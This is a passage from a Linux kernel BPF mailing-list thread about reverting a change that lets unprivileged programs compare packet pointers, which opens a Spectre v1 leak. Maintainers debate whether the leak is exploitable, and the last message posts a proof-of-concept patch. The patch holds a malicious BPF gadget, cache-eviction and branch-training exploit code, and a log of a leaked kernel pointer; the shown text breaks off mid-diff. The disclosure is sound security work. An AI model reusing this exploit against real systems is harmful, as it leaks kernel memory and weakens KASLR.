>>    3b:   imul   $0x61,%r8,%r8 // leak using port contention side channel
>>    3f:   xor    %eax,%eax
>>    41:   pop    %rbx
>>    42:   leaveq
>>    43:   retq
>>
>> Here I'm using a port contention side channel because storing the secret
>> to the stack causes the verifier to insert an lfence for unrelated
>> reasons (SSB mitigation) which would terminate the speculation.
>>
>> As Daniel already pointed out to me, data_end is even attacker
>> controlled as one could send many packets of sufficient length to train
>> the branch prediction into assuming data_end >= data will never be true.
>> When the attacker then sends a packet with insufficient data, the
>> Spectre v1 gadget leaks the chosen bit of some value that lies behind
>> data_end.
>>
>> To make it clear that the problem is not the pointer comparison but the
>> missing masking instruction, it can be useful to transform the code
>> above into the following equivalent pseudocode:
>>
>> r2 = data
>> r3 = data_end
>> r6 = ... // index to access, constant does not help
>> r7 = data_end - data // only known at runtime, could be [0,PKT_MAX)
>> if !(r6 < r7) goto exit
>> // no masking of index in r6 happens
>> r2 += r6 // addr. to access
>> r5 = *(u8 *)(r2 + 0) // speculatively read secret
>> // ... leak secret as above
>>
>> One idea to resolve this while still allowing for unprivileged packet
>> access would be to always allocate a power of 2 for the packet data and
>> then also pass the respective index mask in the skb structure. The
>> verifier would then have to check that this index mask is always applied
>> to the offset before a packet pointer is dereferenced. This patch does
>> not implement this extension, but only reverts [3].
> 
> Hi Luis,
> 
> The skb pointer comparison is a reasonable operation in a networking bpf prog.
> If we just prohibit a reasonable operation to prevent a possible
> spectre v1 attack, it looks a little weird, right ?
> Should we figure out a real fix to prevent it ?
> 

I see your point, but this has been the case since Spectre v1 was 
mitigated for BPF. I actually did a few statistics on that in [1] and 
 >50 out of ~350 programs are rejected because of the Spectre v1 
mitigations. However, to repeat: The operation is not completely 
prohibited, only prohibited without CAP_PERFMON.

Maybe it would be possible to expose the allow_ptr_leaks/bpf_spec_vX 
flags in sysfs? It would be helpful for debugging, and you could set it 
to 1 permanently for your purposes. However, I'm not sure if the others 
would like that...

Another solution I have been working on in [2] is to change the 
mitigations to insert an lfence instead of rejecting the program 
entirely. That would have bad performance, but would still be better 
than completely rejecting the program. However, these patches are far 
from going upstream currently.

A detail: The patches in [2] currently do not support the case we are 
discussing here, they only insert fences when the speculative paths fail 
to verify.

[1] 
https://sys.cs.fau.de/extern/person/gerhorst/23-03_fgbs-spring-2023-presentation.pdf 
- Slide 9
[2] 
https://gitlab.cs.fau.de/un65esoq/linux/-/commits/v6.5-rc6-bpf-spectre-nospec/
Yafang Shao Sept. 19, 2023, 3:43 a.m. UTC | #7
On Mon, Sep 18, 2023 at 7:52 PM Luis Gerhorst <gerhorst@cs.fau.de> wrote:
>
> On 15/09/2023 04:26, Yafang Shao wrote:
> > On Wed, Sep 13, 2023 at 8:30 PM Luis Gerhorst <gerhorst@amazon.de> wrote:
> >>
> >> This reverts commit d75e30dddf73449bc2d10bb8e2f1a2c446bc67a2.
> >>
> >> To mitigate Spectre v1, the verifier relies on static analysis to deduct
> >> constant pointer bounds, which can then be enforced by rewriting pointer
> >> arithmetic [1] or index masking [2]. This relies on the fact that every
> >> memory region to be accessed has a static upper bound and every date
> >> below that bound is accessible. The verifier can only rewrite pointer
> >> arithmetic or insert masking instructions to mitigate Spectre v1 if a
> >> static upper bound, below of which every access is valid, can be given.
> >>
> >> When allowing packet pointer comparisons, this introduces a way for the
> >> program to effectively construct an accessible pointer for which no
> >> static upper bound is known. Intuitively, this is obvious as a packet
> >> might be of any size and therefore 0 is the only statically known upper
> >> bound below of which every date is always accessible (i.e., none).
> >>
> >> To clarify, the problem is not that comparing two pointers can be used
> >> for pointer leaks in the same way in that comparing a pointer to a known
> >> scalar can be used for pointer leaks. That is because the "secret"
> >> components of the addresses cancel each other out if the pointers are
> >> into the same region.
> >>
> >> With [3] applied, the following malicious BPF program can be loaded into
> >> the kernel without CAP_PERFMON:
> >>
> >> r2 = *(u32 *)(r1 + 76) // data
> >> r3 = *(u32 *)(r1 + 80) // data_end
> >> r4 = r2
> >> r4 += 1
> >> if r4 > r3 goto exit
> >> r5 = *(u8 *)(r2 + 0) // speculatively read secret
> >> r5 &= 1 // choose bit to leak
> >> // ... side channel to leak secret bit
> >> exit:
> >> // ...
> >>
> >> This is jited to the following amd64 code which still contains the
> >> gadget:
> >>
> >>     0:   endbr64
> >>     4:   nopl   0x0(%rax,%rax,1)
> >>     9:   xchg   %ax,%ax
> >>     b:   push   %rbp
> >>     c:   mov    %rsp,%rbp
> >>     f:   endbr64
> >>    13:   push   %rbx
> >>    14:   mov    0xc8(%rdi),%rsi // data
> >>    1b:   mov    0x50(%rdi),%rdx // data_end
> >>    1f:   mov    %rsi,%rcx
> >>    22:   add    $0x1,%rcx
> >>    26:   cmp    %rdx,%rcx
> >>    29:   ja     0x000000000000003f // branch to mispredict
> >>    2b:   movzbq 0x0(%rsi),%r8 // speculative load of secret
> >>    30:   and    $0x1,%r8 // choose bit to leak
> >>    34:   xor    %ebx,%ebx
> >>    36:   cmp    %rbx,%r8
> >>    39:   je     0x000000000000003f // branch based on secret
> >>    3b:   imul   $0x61,%r8,%r8 // leak using port contention side channel
> >>    3f:   xor    %eax,%eax
> >>    41:   pop    %rbx
> >>    42:   leaveq
> >>    43:   retq
> >>
> >> Here I'm using a port contention side channel because storing the secret
> >> to the stack causes the verifier to insert an lfence for unrelated
> >> reasons (SSB mitigation) which would terminate the speculation.
> >>
> >> As Daniel already pointed out to me, data_end is even attacker
> >> controlled as one could send many packets of sufficient length to train
> >> the branch prediction into assuming data_end >= data will never be true.
> >> When the attacker then sends a packet with insufficient data, the
> >> Spectre v1 gadget leaks the chosen bit of some value that lies behind
> >> data_end.
> >>
> >> To make it clear that the problem is not the pointer comparison but the
> >> missing masking instruction, it can be useful to transform the code
> >> above into the following equivalent pseudocode:
> >>
> >> r2 = data
> >> r3 = data_end
> >> r6 = ... // index to access, constant does not help
> >> r7 = data_end - data // only known at runtime, could be [0,PKT_MAX)
> >> if !(r6 < r7) goto exit
> >> // no masking of index in r6 happens
> >> r2 += r6 // addr. to access
> >> r5 = *(u8 *)(r2 + 0) // speculatively read secret
> >> // ... leak secret as above
> >>
> >> One idea to resolve this while still allowing for unprivileged packet
> >> access would be to always allocate a power of 2 for the packet data and
> >> then also pass the respective index mask in the skb structure. The
> >> verifier would then have to check that this index mask is always applied
> >> to the offset before a packet pointer is dereferenced. This patch does
> >> not implement this extension, but only reverts [3].
> >
> > Hi Luis,
> >
> > The skb pointer comparison is a reasonable operation in a networking bpf prog.
> > If we just prohibit a reasonable operation to prevent a possible
> > spectre v1 attack, it looks a little weird, right ?
> > Should we figure out a real fix to prevent it ?
> >
>
> I see your point, but this has been the case since Spectre v1 was
> mitigated for BPF. I actually did a few statistics on that in [1] and
>  >50 out of ~350 programs are rejected because of the Spectre v1
> mitigations. However, to repeat: The operation is not completely
> prohibited, only prohibited without CAP_PERFMON.
>
> Maybe it would be possible to expose the allow_ptr_leaks/bpf_spec_vX
> flags in sysfs? It would be helpful for debugging, and you could set it
> to 1 permanently for your purposes. However, I'm not sure if the others
> would like that...

I really appreciate that idea. I actually shared a similar concept earlier.[1].
Nonetheless, I believe it would be prudent to align with the system
settings regarding CPU security mitigations within the BPF subsystem
as well. In our production environment, we consistently configure it
with "mitigations=off"[2] to enhance performance, essentially
deactivating all optional CPU mitigations. Consequently, if we
implement a system-wide "mitigations=off" setting, it should also
inherently bypass Spectre v1 and Spectre v4 in the BPF subsystem.

Alexei, Daniel, any comments ?

[1]. https://lore.kernel.org/bpf/CALOAHbDDT=paFEdTb1Jsqu7eGkFXAh6A+f21VTrMdAeq5F60kg@mail.gmail.com/
[2]. https://www.kernel.org/doc/html/latest/admin-guide/kernel-parameters.html

>
> Another solution I have been working on in [2] is to change the
> mitigations to insert an lfence instead of rejecting the program
> entirely. That would have bad performance, but would still be better
> than completely rejecting the program. However, these patches are far
> from going upstream currently.
>
> A detail: The patches in [2] currently do not support the case we are
> discussing here, they only insert fences when the speculative paths fail
> to verify.
>
> [1]
> https://sys.cs.fau.de/extern/person/gerhorst/23-03_fgbs-spring-2023-presentation.pdf
> - Slide 9
> [2]
> https://gitlab.cs.fau.de/un65esoq/linux/-/commits/v6.5-rc6-bpf-spectre-nospec/
>
> --
> Luis



--
Regards
Yafang
Daniel Borkmann Sept. 19, 2023, 6:43 a.m. UTC | #8
On 9/19/23 5:43 AM, Yafang Shao wrote:
> On Mon, Sep 18, 2023 at 7:52 PM Luis Gerhorst <gerhorst@cs.fau.de> wrote:
>> On 15/09/2023 04:26, Yafang Shao wrote:
>>> On Wed, Sep 13, 2023 at 8:30 PM Luis Gerhorst <gerhorst@amazon.de> wrote:
>>>>
>>>> This reverts commit d75e30dddf73449bc2d10bb8e2f1a2c446bc67a2.
>>>>
>>>> To mitigate Spectre v1, the verifier relies on static analysis to deduct
>>>> constant pointer bounds, which can then be enforced by rewriting pointer
>>>> arithmetic [1] or index masking [2]. This relies on the fact that every
>>>> memory region to be accessed has a static upper bound and every date
>>>> below that bound is accessible. The verifier can only rewrite pointer
>>>> arithmetic or insert masking instructions to mitigate Spectre v1 if a
>>>> static upper bound, below of which every access is valid, can be given.
>>>>
>>>> When allowing packet pointer comparisons, this introduces a way for the
>>>> program to effectively construct an accessible pointer for which no
>>>> static upper bound is known. Intuitively, this is obvious as a packet
>>>> might be of any size and therefore 0 is the only statically known upper
>>>> bound below of which every date is always accessible (i.e., none).
>>>>
>>>> To clarify, the problem is not that comparing two pointers can be used
>>>> for pointer leaks in the same way in that comparing a pointer to a known
>>>> scalar can be used for pointer leaks. That is because the "secret"
>>>> components of the addresses cancel each other out if the pointers are
>>>> into the same region.
>>>>
>>>> With [3] applied, the following malicious BPF program can be loaded into
>>>> the kernel without CAP_PERFMON:
>>>>
>>>> r2 = *(u32 *)(r1 + 76) // data
>>>> r3 = *(u32 *)(r1 + 80) // data_end
>>>> r4 = r2
>>>> r4 += 1
>>>> if r4 > r3 goto exit
>>>> r5 = *(u8 *)(r2 + 0) // speculatively read secret
>>>> r5 &= 1 // choose bit to leak
>>>> // ... side channel to leak secret bit
>>>> exit:
>>>> // ...
>>>>
>>>> This is jited to the following amd64 code which still contains the
>>>> gadget:
>>>>
>>>>      0:   endbr64
>>>>      4:   nopl   0x0(%rax,%rax,1)
>>>>      9:   xchg   %ax,%ax
>>>>      b:   push   %rbp
>>>>      c:   mov    %rsp,%rbp
>>>>      f:   endbr64
>>>>     13:   push   %rbx
>>>>     14:   mov    0xc8(%rdi),%rsi // data
>>>>     1b:   mov    0x50(%rdi),%rdx // data_end
>>>>     1f:   mov    %rsi,%rcx
>>>>     22:   add    $0x1,%rcx
>>>>     26:   cmp    %rdx,%rcx
>>>>     29:   ja     0x000000000000003f // branch to mispredict
>>>>     2b:   movzbq 0x0(%rsi),%r8 // speculative load of secret
>>>>     30:   and    $0x1,%r8 // choose bit to leak
>>>>     34:   xor    %ebx,%ebx
>>>>     36:   cmp    %rbx,%r8
>>>>     39:   je     0x000000000000003f // branch based on secret
>>>>     3b:   imul   $0x61,%r8,%r8 // leak using port contention side channel
>>>>     3f:   xor    %eax,%eax
>>>>     41:   pop    %rbx
>>>>     42:   leaveq
>>>>     43:   retq
>>>>
>>>> Here I'm using a port contention side channel because storing the secret
>>>> to the stack causes the verifier to insert an lfence for unrelated
>>>> reasons (SSB mitigation) which would terminate the speculation.
>>>>
>>>> As Daniel already pointed out to me, data_end is even attacker
>>>> controlled as one could send many packets of sufficient length to train
>>>> the branch prediction into assuming data_end >= data will never be true.
>>>> When the attacker then sends a packet with insufficient data, the
>>>> Spectre v1 gadget leaks the chosen bit of some value that lies behind
>>>> data_end.
>>>>
>>>> To make it clear that the problem is not the pointer comparison but the
>>>> missing masking instruction, it can be useful to transform the code
>>>> above into the following equivalent pseudocode:
>>>>
>>>> r2 = data
>>>> r3 = data_end
>>>> r6 = ... // index to access, constant does not help
>>>> r7 = data_end - data // only known at runtime, could be [0,PKT_MAX)
>>>> if !(r6 < r7) goto exit
>>>> // no masking of index in r6 happens
>>>> r2 += r6 // addr. to access
>>>> r5 = *(u8 *)(r2 + 0) // speculatively read secret
>>>> // ... leak secret as above
>>>>
>>>> One idea to resolve this while still allowing for unprivileged packet
>>>> access would be to always allocate a power of 2 for the packet data and
>>>> then also pass the respective index mask in the skb structure. The
>>>> verifier would then have to check that this index mask is always applied
>>>> to the offset before a packet pointer is dereferenced. This patch does
>>>> not implement this extension, but only reverts [3].
>>>
>>> Hi Luis,
>>>
>>> The skb pointer comparison is a reasonable operation in a networking bpf prog.
>>> If we just prohibit a reasonable operation to prevent a possible
>>> spectre v1 attack, it looks a little weird, right ?
>>> Should we figure out a real fix to prevent it ?
>>>
>>
>> I see your point, but this has been the case since Spectre v1 was
>> mitigated for BPF. I actually did a few statistics on that in [1] and
>>   >50 out of ~350 programs are rejected because of the Spectre v1
>> mitigations. However, to repeat: The operation is not completely
>> prohibited, only prohibited without CAP_PERFMON.
>>
>> Maybe it would be possible to expose the allow_ptr_leaks/bpf_spec_vX
>> flags in sysfs? It would be helpful for debugging, and you could set it
>> to 1 permanently for your purposes. However, I'm not sure if the others
>> would like that...
> 
> I really appreciate that idea. I actually shared a similar concept earlier.[1].
> Nonetheless, I believe it would be prudent to align with the system
> settings regarding CPU security mitigations within the BPF subsystem
> as well. In our production environment, we consistently configure it
> with "mitigations=off"[2] to enhance performance, essentially
> deactivating all optional CPU mitigations. Consequently, if we
> implement a system-wide "mitigations=off" setting, it should also
> inherently bypass Spectre v1 and Spectre v4 in the BPF subsystem.
> 
> Alexei, Daniel, any comments ?

Yes, I think that would be acceptable as a global override. At least I
don't see it would make anything worse if the rest of the system has
mitigations disabled anyway.

> [1]. https://lore.kernel.org/bpf/CALOAHbDDT=paFEdTb1Jsqu7eGkFXAh6A+f21VTrMdAeq5F60kg@mail.gmail.com/
> [2]. https://www.kernel.org/doc/html/latest/admin-guide/kernel-parameters.html
> 
>> Another solution I have been working on in [2] is to change the
>> mitigations to insert an lfence instead of rejecting the program
>> entirely. That would have bad performance, but would still be better
>> than completely rejecting the program. However, these patches are far
>> from going upstream currently.
>>
>> A detail: The patches in [2] currently do not support the case we are
>> discussing here, they only insert fences when the speculative paths fail
>> to verify.
>>
>> [1]
>> https://sys.cs.fau.de/extern/person/gerhorst/23-03_fgbs-spring-2023-presentation.pdf
>> - Slide 9
>> [2]
>> https://gitlab.cs.fau.de/un65esoq/linux/-/commits/v6.5-rc6-bpf-spectre-nospec/
>>
>> --
>> Luis
> 
> 
> 
> --
> Regards
> Yafang
>
Alexei Starovoitov Sept. 19, 2023, 8:57 a.m. UTC | #9
On Mon, Sep 18, 2023 at 4:26 AM Luis Gerhorst <gerhorst@amazon.de> wrote:
>
> It is true that this is not easily possible using the method most exploits use,
> at least to my knowledge (i.e., accessing the same address from another core).
> However, it is still possible to evict the cacheline with skb->data/data_end
> from the cache in between the loads by iterating over a large map using
> bpf_loop(). Then the load of skb->data_end would be slow while skb->data is
> readily available in a callee-saved register.

...

> call %[bpf_loop]; \
> gadget_%=: \
> r2 = *(u32 *)(r7 + 80);   \
> if r2 <= r9 goto exit_%=; \

r9 is supposed to be available in the callee-saved register? :)
I think you're missing that it is _callee_ saved.
If that bpf_loop indeed managed to flush L1 cache the
refill of r9 in the epilogue would be a cache miss.
And r7 will be a cache miss as well.
So there is no chance cpu will execute 'if r2 <= r9' speculatively.

I have to agree that the above approach sounds plausible in theory
and I've never seen anyone propose to mispredict a branch
this way. Which also means that no known speculation attack
was crafted. I suspect that's a strong sign that
the above approach is indeed a theory and it doesn't work in practice.
Likely because the whole cache is flushed the subsequent misses
will spoil all speculation. For spec v1 to work you need
only one slow load in one side of that branch.
The other load and the speculative code after should not miss.
When it does the spec code won't be able to leave the breadcrumbs
of the leaked bit in the cache.
'Leak full byte' is also 'wishful thinking' imo.
I haven't seen any attack that leaks byte at-a-time.

So I will insist on seeing a full working exploit before doing
anything else here. It's good to discuss this cpu speculation
concerns, but we have to stay practical.
Even removing bpf from the picture there is so much code
in the network core that checks packet boundaries.
One can find plenty of cases of 'read past skb->end'
under speculation and I'm arguing none of them are exploitable.
Luis Gerhorst Sept. 28, 2023, 11:09 a.m. UTC | #10
On Tue, 19 Sep 2023 01:57:21 -0700 Alexei Starovoitov wrote:
> r9 is supposed to be available in the callee-saved register? :)
> I think you're missing that it is _callee_ saved.

I'm sorry I guess this was not clear enough, the idea was that this
register is not used by the callee, and therefore it also does not have
to be restored. Anyway, this does not appear to be important (I guess
because the return has to pull the stack into the cache anyway), see
below.

> If that bpf_loop indeed managed to flush L1 cache the
> refill of r9 in the epilogue would be a cache miss.
> And r7 will be a cache miss as well.
> So there is no chance cpu will execute 'if r2 <= r9' speculatively.
>
> I have to agree that the above approach sounds plausible in theory
> and I've never seen anyone propose to mispredict a branch
> this way. Which also means that no known speculation attack
> was crafted. I suspect that's a strong sign that
> the above approach is indeed a theory and it doesn't work in practice.
> Likely because the whole cache is flushed the subsequent misses
> will spoil all speculation. For spec v1 to work you need
> only one slow load in one side of that branch.
> The other load and the speculative code after should not miss.
> When it does the spec code won't be able to leave the breadcrumbs
> of the leaked bit in the cache.
> 'Leak full byte' is also 'wishful thinking' imo.
> I haven't seen any attack that leaks byte at-a-time.
>
> So I will insist on seeing a full working exploit before doing
> anything else here. It's good to discuss this cpu speculation
> concerns, but we have to stay practical.

I tried this and below you find a patch that leaks the otherwise
inaccessible skb_shinfo(skb)->frags[0].bv_page which lies 196 bytes
behind skb->data_end from userspace at 100B/h.

However, you are right in that there does not appear to be anything extremely
useful behind skb->data_end, destructor_arg is NULL in my setup but I
have also not found any code putting a static pointer there. Therefore
if it stays like this and we are sure the allocator introduces
sufficient randomness to make OOB reads useless, the original patches
can stay. If you decide to do this I will be happy to craft a patch that
documents that the respective structs should be considered 'public'
under Spectre v1 to make sure nobody puts anything sensitive there.

The exploit (if you consider leaking a struct page * and exploit) does
not leak more than one bit per mispredict (I did not try that) but
flushing data_end from the cache using bpf_loop() indeed appears to have
the desired effect (if you remove it, it doesn't work).

> One can find plenty of cases of 'read past skb->end'
> under speculation and I'm arguing none of them are exploitable.

I have not looked into those but I guess flushing the cache in between
the loads does not happen there.

Here's a shortened session log for using the patch below:

$ lsb_release -a
Description:    Debian GNU/Linux 11 (bullseye)
$ uname -a
Linux $HOST 5.10.0-25-cloud-amd64 #1 SMP Debian 5.10.191-1 (2023-08-16) x86_64 GNU/Linux
$ lscpu
Socket(s):                          2
Model name:                         Intel(R) Xeon(R) CPU E5-2686 v4 @ 2.30GHz
Virtualization:                     VT-x
Vulnerability Spectre v1:           Mitigation; usercopy/swapgs barriers and __user pointer sanitization
$ stress-ng --cache $(nproc) --cache-level 3 &
$ ./tools/testing/selftests/bpf/vmtest.sh -- time ./test_progs -t tc_bpf
<...>
[    0.297557] smpboot: CPU0: Intel(R) Xeon(R) CPU E5-2686 v4 @ 2.30GHz (family: 0x6, model: 0x4f, stepping: 0x1)
<...>
userspace guess for *(u64 *)(data+366 = data_end+196) = 0xffffdd2f04159400

You can already see that looks like a pointer. To also let the kernel print the
actual value remove the '#if 0' in cls_bpf_classify(). With that you can
check whether the middle bits are correct:

$ ./tools/testing/selftests/bpf/vmtest.sh -- time ./test_progs -t tc_bpf
<...>
[    2.399485] kernel skb_shinfo(skb)->frags[0].bv_page
[    2.399485]  *(ffff8a7541154670 ?= data+366 = ffff8a7541154670) = ffffe387c4155e00
<...>
userspace guess for *(u64 *)(data+366 = data_end+196) = 0xffffe387c4155e00

Misc: Please make sure you always reply-to/cc gerhorst@cs.fau.de as
gerhorst@amazon.de will become unmonitored shortly.

Signed-off-by: Luis Gerhorst <gerhorst@amazon.de>
Signed-off-by: Luis Gerhorst <gerhorst@cs.fau.de>
---
 net/sched/cls_bpf.c                           |  22 ++
 .../testing/selftests/bpf/prog_tests/tc_bpf.c | 334 +++++++++++++++++-
 .../testing/selftests/bpf/progs/test_tc_bpf.c |  78 +++-
 .../selftests/bpf/progs/test_tc_bpf_pkt_ptr.h | 172 +++++++++
 .../bpf/progs/test_tc_bpf_pkt_ptr_byte.h      |  31 ++
 5 files changed, 625 insertions(+), 12 deletions(-)
 mode change 100644 => 100755 tools/testing/selftests/bpf/prog_tests/tc_bpf.c
 mode change 100644 => 100755 tools/testing/selftests/bpf/progs/test_tc_bpf.c
 create mode 100644 tools/testing/selftests/bpf/progs/test_tc_bpf_pkt_ptr.h
 create mode 100644 tools/testing/selftests/bpf/progs/test_tc_bpf_pkt_ptr_byte.h

diff --git a/net/sched/cls_bpf.c b/net/sched/cls_bpf.c
index 382c7a71f81f..ef36ebca3b11 100644
--- a/net/sched/cls_bpf.c
+++ b/net/sched/cls_bpf.c
@@ -99,6 +99,28 @@ TC_INDIRECT_SCOPE int cls_bpf_classify(struct sk_buff *skb,
 			__skb_push(skb, skb->mac_len);
 			bpf_compute_data_pointers(skb);
 			filter_res = bpf_prog_run(prog->filter, skb);
+
+#if 0
+			// Print after program to not mess with the cache.
+			static atomic_t init = ATOMIC_INIT(0);
+			if (unlikely(skb_headlen(skb) == 170 && atomic_inc_return(&init) == 1)) {
+				barrier_nospec();
+				struct bpf_skb_data_end *cb = (struct bpf_skb_data_end *)skb->cb;
+				pr_err_ratelimited(
+					"skb = %px, skb_headlen(skb) = %d\n"
+					"data *(%px) = %px\n"
+					"data_end *(%px) = %px\n"
+					"kernel skb_shinfo(skb)->frags[0].bv_page\n\t*(%px ?= data+366 = %px) = %px\n",
+					skb, skb_headlen(skb),
+					&(skb->data), skb->data,
+					&(cb->data_end), cb->data_end,
+					&skb_shinfo(skb)->frags[0].bv_page,
+					((char *) skb->data) + 366,
+					skb_shinfo(skb)->frags[0].bv_page
+				);
+			}
+#endif
+
 			__skb_pull(skb, skb->mac_len);
 		} else {
 			bpf_compute_data_pointers(skb);
diff --git a/tools/testing/selftests/bpf/prog_tests/tc_bpf.c b/tools/testing/selftests/bpf/prog_tests/tc_bpf.c
old mode 100644
new mode 100755
index 48b55539331e..ec82e95895b5
--- a/tools/testing/selftests/bpf/prog_tests/tc_bpf.c
+++ b/tools/testing/selftests/bpf/prog_tests/tc_bpf.c
@@ -2,6 +2,8 @@
 
 #include <test_progs.h>
 #include <linux/pkt_cls.h>
+#include <arpa/inet.h>
+#include <sys/socket.h>
 
 #include "cap_helpers.h"
 #include "test_tc_bpf.skel.h"
@@ -395,6 +397,251 @@ void tc_bpf_root(void)
 	test_tc_bpf__destroy(skel);
 }
 
+static void die(char *s)
+{
+	perror(s);
+	exit(1);
+}
+
+#define SERVER "127.0.0.1"
+#define BUFLEN (128 * 1024)
+#define PORT 8888
+
+static int client(struct sockaddr_in *si_other) {
+	static int s = -1;
+	if ((s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) {
+		die("socket");
+	}
+
+	memset((char *) si_other, 0, sizeof(si_other));
+	si_other->sin_family = AF_INET;
+	si_other->sin_port = htons(PORT);
+
+	if (inet_aton(SERVER , &si_other->sin_addr) == 0) {
+		fprintf(stderr, "inet_aton() failed\n");
+		exit(1);
+	}
+
+	return s;
+}
+
+static int server(void) {
+	struct sockaddr_in si_me;
+	int s;
+
+	if ((s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) {
+		die("socket");
+	}
+
+	memset((char *) &si_me, 0, sizeof(si_me));
+
+	si_me.sin_family = AF_INET;
+	si_me.sin_port = htons(PORT);
+	si_me.sin_addr.s_addr = htonl(INADDR_ANY);
+
+	if (bind(s, (struct sockaddr *) &si_me, sizeof(si_me)) == -1) {
+		die("bind");
+	}
+
+	return s;
+}
+
+static int client_ping(int s, struct sockaddr_in *si_other, size_t n) {
+	unsigned int slen = sizeof(*si_other);
+	static char message[BUFLEN] = {};
+	memset(message, 0x37, n);
+
+	if (sendto(s, message, n, 0, (struct sockaddr *) si_other, slen) == -1) {
+		die("sendto()");
+	}
+
+	return 0;
+}
+
+#define CAT(a, b, d, c) a ## b ## d ## c
+#define NAME(S1, S2) CAT(pkt_ptr_, S1, _, S2)
+
+#define EI_MASK(BYTE, MASK)			\
+	else if (offset == BYTE && mask == MASK) fd = bpf_program__fd(skel->progs.NAME(BYTE, MASK));
+
+#define EI_BYTE(BYTE) \
+	EI_MASK(BYTE, 1) \
+	EI_MASK(BYTE, 2) \
+	EI_MASK(BYTE, 4) \
+	EI_MASK(BYTE, 8) \
+	EI_MASK(BYTE, 16) \
+	EI_MASK(BYTE, 32) \
+	EI_MASK(BYTE, 64) \
+	EI_MASK(BYTE, 128)
+
+static int exploit(struct test_tc_bpf *skel, long long *skipped, long long *total,
+				   long long *t0, long long *t1, int offset, int mask) {
+	DECLARE_LIBBPF_OPTS(bpf_tc_hook, hook, .ifindex = LO_IFINDEX, .attach_point = BPF_TC_INGRESS);
+
+	int fd;
+	if (offset == 350 && mask == 1) fd = bpf_program__fd(skel->progs.pkt_ptr_350_1);
+	EI_BYTE(366)
+	EI_BYTE(367)
+	EI_BYTE(368)
+	EI_BYTE(369)
+	EI_BYTE(370)
+	EI_BYTE(371)
+	EI_BYTE(372)
+	EI_BYTE(373)
+	else {
+		errno = EINVAL;
+		die("mask/offset");
+	}
+
+	DECLARE_LIBBPF_OPTS(bpf_tc_opts, opts, .prog_fd = fd);
+	int ret;
+
+	ret = bpf_tc_hook_create(&hook);
+	ret = ret == -EEXIST ? 0 : ret;
+	if (ret) {
+		errno = -ret;
+		perror("hook create");
+		if (!ASSERT_OK(ret, "bpf_tc_hook_create(BPF_TC_INGRESS)"))
+			goto destroy;
+	}
+
+	ret = bpf_tc_attach(&hook, &opts);
+	if (ret)
+		if (!ASSERT_OK(ret, "bpf_tc_attach"))
+			goto end;
+
+	int ss = server();
+	struct sockaddr_in si_server;
+	int cs = client(&si_server);
+
+	client_ping(cs, &si_server, 16*1024); // make it set bv_page != 0
+
+#define LEAKMAP_ENTRIES (5 * 512)
+
+	for (__u32 i = 0; i < LEAKMAP_ENTRIES; i += 512) {
+		__u32 key = i;
+		__s64 value = -i;
+		ret = bpf_map__update_elem(skel->maps.leakmap,
+								   &key, sizeof(key),
+								   &value, sizeof(value), 0);
+		if (ret) {
+			if (!ASSERT_OK(ret, "init_leak"))
+				goto end;
+		}
+	}
+
+// for 128KiB L1d, 90MiB L3, 1536-entry sltlb
+#define EVICTMAP_ENTRIES (8 * 128 * 1024)
+	for (__u32 i = 0; i < EVICTMAP_ENTRIES; i += 8) {
+		__u32 index = i / 8;
+		__u32 key = i + (index % 8);
+		__u64 value = i;
+		ret = bpf_map__update_elem(skel->maps.evictmap, &key, sizeof(key), &value, sizeof(value), 0);
+		if (ret) {
+			if (!ASSERT_OK(ret, "init_evict"))
+				goto end;
+		}
+	}
+
+	long long n = 0;
+#define T 8
+#define N 8
+	long long i;
+	for (i = 0; n < N; i++) {
+		// Branch prediction using PHT will be wrong unless it knows rand().
+		int t = rand() % T;
+		for (int j = 0; j < t; j++) {
+			client_ping(cs, &si_server, 512);
+		}
+		client_ping(cs, &si_server, 128); // + 42 byte header
+
+#define X 4
+		__s64 delta[X];
+		for (size_t j = 0; j < X; j++) {
+			__u32 key[X] = {0, 512, 1536, 1024};
+			ret = bpf_map__lookup_elem(skel->maps.leakmap, &key[j], sizeof(key[j]),
+									   &delta[j], sizeof(delta[j]), 0);
+			if (ret) {
+				if (!ASSERT_OK(ret, "delta lookup"))
+					goto end;
+			}
+			if (delta[j] <= 0) {
+				ASSERT_OK(-1, "delta not written by bpf program");
+			}
+		}
+
+		__u32 key = 2048;
+		__u64 err;
+		ret = bpf_map__lookup_elem(skel->maps.leakmap, &key, sizeof(key), &err, sizeof(err), 0);
+		if (ret) {
+			if (!ASSERT_OK(ret, "err lookup"))
+				goto end;
+		}
+		static bool first = true;
+		if (err && first) {
+			first = false;
+			ASSERT_OK(-err, "bpf");
+		}
+
+		if (i == 2 * 2 * N) {
+			// reload and retry
+			ret = -1;
+			// fprintf(stderr, "i: timeout after %lld reps\n", i);
+			break;
+		}
+
+		// sometimes everything is still in the cache
+		if (!((delta[3] < delta[2]))) {
+			// fprintf(stderr, "skip: uncached\t%lld, cached\t%lld, 0\t%lld, 1\t%lld\n", delta[2], delta[3], delta[0], delta[1]);
+			continue;
+		}
+
+		if (delta[0] > delta[1])
+			*t0 += 1000;
+		else
+			*t1 += 1000;
+		n++;
+	}
+
+	*skipped += i-n;
+	*total += i;
+
+	if (n > 0) {
+		*t0 /= n;
+		*t1 /= n;
+	}
+
+	__u32 key = 0;
+	__u64 value;
+	int ret2 = bpf_map__lookup_elem(skel->maps.evictmap,
+							   &key, sizeof(key),
+							   &value, sizeof(value), 0);
+	if (ret2) {
+		if (!ASSERT_OK(ret2, "lookup"))
+			goto end;
+	}
+	if (value > i*T) {
+		ASSERT_OK(-1, "BUG value > i*T");
+		goto end;
+	}
+
+end:
+	close(ss);
+	close(cs);
+
+	opts.prog_fd = opts.prog_id = 0;
+	ret2 = bpf_tc_detach(&hook, &opts);
+	if (ret2)
+		ASSERT_OK(ret2, "bpf_tc_detach");
+
+destroy:
+	ret2 = bpf_tc_hook_destroy(&hook);
+	if (ret2)
+		ASSERT_OK(ret2, "bpf_tc_hook_destroy");
+
+	return ret;
+}
+
 void tc_bpf_non_root(void)
 {
 	struct test_tc_bpf *skel = NULL;
@@ -409,11 +656,90 @@ void tc_bpf_non_root(void)
 	if (!ASSERT_OK(ret, "disable_cap_sys_admin"))
 		goto restore_cap;
 
-	skel = test_tc_bpf__open_and_load();
-	if (!ASSERT_OK_PTR(skel, "test_tc_bpf__open_and_load"))
-		goto restore_cap;
+	libbpf_set_print(NULL);
+
+#define O 1
+	for (int k = 0; k < O; k++) {// to test reproducibility
+
+		// Must match generated pkt_ptr programs in test_tc_bpf.c and exploit()
+		// function.
+		__u64 base_byte = 366;
+
